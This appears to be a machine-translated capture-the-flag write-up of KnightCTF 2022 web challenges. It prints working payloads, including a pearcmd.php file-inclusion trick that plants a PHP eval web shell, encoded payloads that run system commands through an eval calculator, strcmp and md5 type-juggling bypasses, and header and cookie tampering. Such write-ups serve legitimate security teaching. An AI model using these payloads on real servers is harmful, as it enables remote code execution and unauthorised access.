当前位置：网站首页>KnightCTF WEB

KnightCTF WEB

2022-06-30 14:19:00 【Ff. cheng】

Preface

It's not hard to , Namely fuzz And brain holes

Do Something Special

Button click to find url go to /[email protected]_y#[email protected]_h3r3! ,# Obviously wrong , Put it urlencode Transcode as %23 The visit appears flag

Flag：KCTF{Sp3cial_characters_need_t0_get_Url_enc0ded}

My PHP Site

File contains , You can use the pseudo protocol to read the source code , You can also call directly pearcmd.php Come on getshell

payload

/?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/shell.php+-d+man_dir=<?eval($_POST[0]);?>+-s+

Then include the execution command

FLAG: KCTF{L0C4L_F1L3_1ncLu710n}

Obsfuscation Isn’t Enough

see html Find out jsfuck
Decryption discovery 150484514b6eeb1d99da836d95f6671d.php

Direct access php file
FLAG: KCTF{0bfuscat3d_J4v4Scr1pt_aka_JSFuck}

Zero is not the limit

Hint: /user/
Start returning to a pile of json

/user/ The following corresponds to each user , visit -1 Out flag

FLAG: KCTF{tHeRe_1s_n0_l1m1t}

Find Pass Code – 1

Found comments ：
Hi Serafin, I learned something new today.
I build this website for you to verify our KnightCTF 2022 pass code. You can view the source code by sending the source param

visit ：url/?source Get the source code

<?php
require "flag.php";
if (isset($_POST["pass_code"])) {
    
    if (strcmp($_POST["pass_code"], $flag) == 0) {
    
        echo "KCTF Flag : {
      $flag}";
    } else {
    
        echo "Oh....My....God. You entered the wrong pass code.<br>";
    }
}
if (isset($_GET["source"])) {
    
    print show_source(__FILE__);
}
?>

Array bypass,Post: pass_code[]=1

FLAG: KCTF{ShOuLd_We_UsE_sTrCmP_lIkE_tHaT}

Most Secure Calculator-1

Source code

<?php
if (isset($_POST["equation"]) && !is_array($_POST["equation"])) {
    
if (empty($_POST["equation"])) {
    
echo "Please enter some eqation.";
} else {
    
if (strlen($_POST["equation"]) >= 25) {
    
	echo "Oow ! You have entered an equation that is too big for me.";
} else {
    
	echo "<h1> Result : <br>";
	eval("echo " . $_POST["equation"] . ";");
	echo "</h1>";
	}}}
?>

Put it straight into eval
FLAG：KCTF{WaS_mY_cAlCuLaToR_sAfE}

Find Pass Code - 2

Magic hash
md5

<?php
require "flag.php";
$old_pass_codes = array("0e215962017", "0e730083352", "0e807097110", "0e840922711");
$old_pass_flag = false;
if (isset($_POST["pass_code"]) && !is_array($_POST["pass_code"])) {
    
    foreach ($old_pass_codes as $old_pass_code) {
    
        if ($_POST["pass_code"] === $old_pass_code) {
    
            $old_pass_flag = true;
            break;
        }
    }
    if ($old_pass_flag) {
    
        echo "Sorry ! It's an old pass code.";
    } else if ($_POST["pass_code"] == md5($_POST["pass_code"])) {
    
        echo "KCTF Flag : {
      $flag}";
    } else {
    
        echo "Oh....My....God. You entered the wrong pass code.<br>";
    }
}
if (isset($_GET["source"])) {
    
    print show_source(__FILE__);
}
?>

Blasting is impossible , Collected magic hash, Just pick one
Magic hash

0e215962017:0e291242476940776845150308577824
0e730083352:0e870635875304277170259950255928
0e807097110:0e318093639164485566453180786895
0e840922711:00e64922204642369621338070008986
0e1137126905:0e291659922323405260514745084877
0e1284838308:0e708279691820928818722257405159
0e2799298535:0e258310720843549656960157258725
0e3335999050:0e130023719718288785799459522477
0e3519466817:0e094940930906507337180165634011

FLAG：KCTF{ShOuD_wE_cOmPaRe_MD5_LiKe_ThAt__Be_SmArT}

Bypass!! Bypass!! Bypass!!

Annotation found

<!-- generats auth token -> /api/request/auth_token -->

After trying bypass 403 Failure

/api/request/auth_token    Allow: POST, OPTIONS
/      Allow: GET, HEAD, OPTIONS

Github Search for the source code bug-bounty-labs

Add the head
X-Authorized-For: Acquired token

FLAG：KCTF{cOngRatUlaT10Ns_wElCoMe_t0_y0ur_daShBoaRd}

Most Secure Calculator -2

Only alphanumeric... Is allowed , That is XOR Reverse to bypass ,fuzz The following construction commands

payload

(~%8C%86%8C%8B%9A%92)(~%D7%DD%8F%88%9B%DD%D6%C4)
("393480"^"@@@@]]")(("[email protected]!8"^"[@@`^@_").(".").("484"^"@@@"))
"\163\171\163\164\145\155"("\143\141\164\40\146\154\141\147\56\164\170\164")

FLAG: KCTF{sHoUlD_I_uSe_eVaL_lIkE_tHaT}

Can you be Admin?

User-Agent: KnightSquad
next
Referer: localhost

Jsfuck Find out Unicode,Unicode Encoding and decoding (bt.cn)

F`V,[email protected]<,q!$?0EpF*DPCA0<oU8RZI/DJ<`sF8

then ascii85 decode , ASCII85 Decoding calculator

username : tareq ,password : IamKnight

After logging in, you are an ordinary user , Then return to the package cookie Return strange fields base64 And then change to Admin, Contract awarding Find out flag

FLAG: KCTF{FiN4LlY_y0u_ar3_4dm1N}

原网站

版权声明
本文为[Ff. cheng]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/02/202202160516566059.html